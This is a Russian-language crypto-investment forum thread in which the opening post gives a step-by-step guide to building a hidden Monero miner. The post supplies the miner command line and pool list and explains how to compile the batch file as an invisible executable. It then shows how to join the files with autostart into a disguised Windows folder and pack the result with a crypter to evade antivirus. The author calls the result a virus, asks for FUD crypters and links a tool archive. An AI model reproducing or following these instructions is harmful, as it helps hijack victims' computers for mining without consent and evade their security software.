MMGP logo
Присоединяйтесь к нашему инвестиционному форуму, на котором уже 642,075 пользователей. Чтобы получить доступ ко многим закрытым разделам и начать общение - зарегистрируйтесь прямо сейчас.
Обсуждение процесса поиска новых блоков для цепочки транзакций в сетях криптовалют. Майнинг, как эмиссия койнов различных криптовалют. Обсуждение сервисов коллективного майнинга.
Старый 19.02.2018, 22:52
#1
Заблокированный
 
Регистрация: 18.02.2018
Сообщений: 7
Благодарностей: 0
Скрытый майнер 32/64 бит. Руководство по созданию для новичков.

Это майнер совсем для новичков. Разрядность определяете сами, 32 или 64 бит. и так поехали.

Сразу прошу не говорить
на тему бесполезности 32-х битных компьютеров для майнинга, т.к.:
1) Их больше, хотя профит от одного отдельно взятого 32х битного компа меньше, чем от х64
2) И на 64-битных системах этот майнер работает.
Из этого следует, что профит будет вероятно даже больший, чем с обычных 64-битных майнеров.
Возможно эта тема уже поднималась
, возможно нет, но думаю, что напомнить будет не лишним.

Итак, приступим!
Для создания данного билда нам понадобятся:
1) Исходники (взяты отсюда https://ru.minergate.com/altminers/claymore-cpu), они есть в архиве.
2) bat2exe.exe
3) OXI_Joiner.exe
4) Криптор, вы можете взять любой
Советую сделать его самим.

Ссылка на архив в конце статьи.

Чтобы начать зарегаемся на MinerGate https://ru.minergate.com/

Наконец сам майнер.

Открываем папку x32, там наши исходники. Жмём ПКМ по "pool 32bit.bat" и жмём изменить, открывается блокнот и там такая запись:
windrws.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x



windrws.exe - это название самого майнера, который мы будем запускать с параметрами указанными в этом батнике, при запущенном майнере процесс в диспетчере задач будет называться именно так, при желании сам windrws.exe , который лежит в папке x32 можно переименовать, но тогда придётся изменить название и в pool 32bit.bat
tcp://xmr.pool.minergate.com:45560 означает то, что мы будем майнить MONERO
Ниже приведу весь список:
BCN tcp://bcn.pool.minergate.com:45550
XMR tcp://xmr.pool.minergate.com:45560
QCN tcp://qcn.pool.minergate.com:45570
XDN tcp://xdn.pool.minergate.com:45620
FCN tcp://fcn.pool.minergate.com:45610
MCN tcp://mcn.pool.minergate.com:45640
DSH tcp://dsh.pool.minergate.com:45720
INF8 tcp://inf8.pool.minergate.com:45750
XDN+XMR tcp://xdn-xmr.pool.minergate.com:45790
FCN+XMR tcp://fcn-xmr.pool.minergate.com:45590
FCN+QCN tcp://fcn-qcn.pool.minergate.com:45600
FCN+DSH tcp://fcn-dsh.pool.minergate.com:45730
FCN+INF8 tcp://fcn-inf8.pool.minergate.com:45760
MCN+QCN tcp://mcn-qcn.pool.minergate.com:45670
MCN+DSH tcp://mcn-dsh.pool.minergate.com:45740
MCN+INF8 tcp://mcn-inf8.pool.minergate.com:45770
Далее меняем [email protected] на наш e-mail, указанный при регистрации на MinerGate'е.
Закрываем, сохраняем.

Следующий шаг - делаем из bat-ника exe-шник, для этого запускаем bat2exe.exe
Указываем путь к нашему батнику и ставим галочку на "Невидимое приложение", как на картинке ниже.


Жмём "Компилировать"
Закрываем bat2exe
Теперь BAT-ник можем удалить, он нам больше не пригодится.

Далее нам нужно сделать из 2х exe-шников 1 с автозапуском, для этого открываем OXI_Joiner.exe
Он выглядит так:



Жмём на большой зелёный (как слоник) плюсик и выбираем наш pool 32bit.exe
Должно получиться это:


Пото дважы кликаем в программе по pool 32bit.exe и выставляем параметры как на картинке.
Путь можете выбрать любой, главное запомните его, он нам понадобится


Жмём большую зелёную галочку.
Далее опять жмём зелёный плюсик и добавляем windrws.exe или как вы его там обозвали, у меня это выглядит так:


Также дважды кликаем на windrws.exe и выставляем параметры как на картинке.
Важно! Для особо невнимательных, параметры тут ДРУГИЕ! Папку указываем ту же, что и в первом случае, у меня это C:\ProgramData\Windows


Опять таки жмём на большую зелёную галочку.
Далее во вкладке "Внешний вид" мы можем поменять иконку и Version info, но в данном случае особого смысла в этом нет
Теперь жмём на большую шестерёнку на фиолетовом фоне и сохраняем наш вирус.

Остался последний штрих, закриптовать всё это дело.
Криптор можете использовать свой или из архива. Если у вас есть FUD криптор, очень за вас рад, если поделитесь, буду рад ещё больше

Итак, чтобы закриптовать открываем "криптор.exe", нажимаем file и указываем путь к нашему новоиспечённому майнеру (я не стал менять название, поэтому у меня он joined.exe) и жмём Crypt, выбираем куда и под каким именем сохранить и всё, майнер готов!


Скачать программы тут- https://mega.nz/#!syxwCLJI!Cb5Cxog63...E5Mc0V5Y8Umy6E
пароль - zero

Тема возможно покажется сложной. программы все полностью рабочие, за исключением криптора, он возможно устарел. Прошу камнями не кидать. Совсем скоро выложу вариант создания майнера за минут 5 максимум. Zcash. Думаю вам было полезно.
zero911 вне форума
Старый 22.02.2018, 17:01
#2
Интересующийся
 
Регистрация: 21.02.2018
Сообщений: 10
Благодарностей: 0
Re: Скрытый майнер 32/64 бит. Руководство по созданию для новичков.

он не работает
trane77751 вне форума
Войдите, чтобы оставить комментарий.
Опции темы

Быстрый переход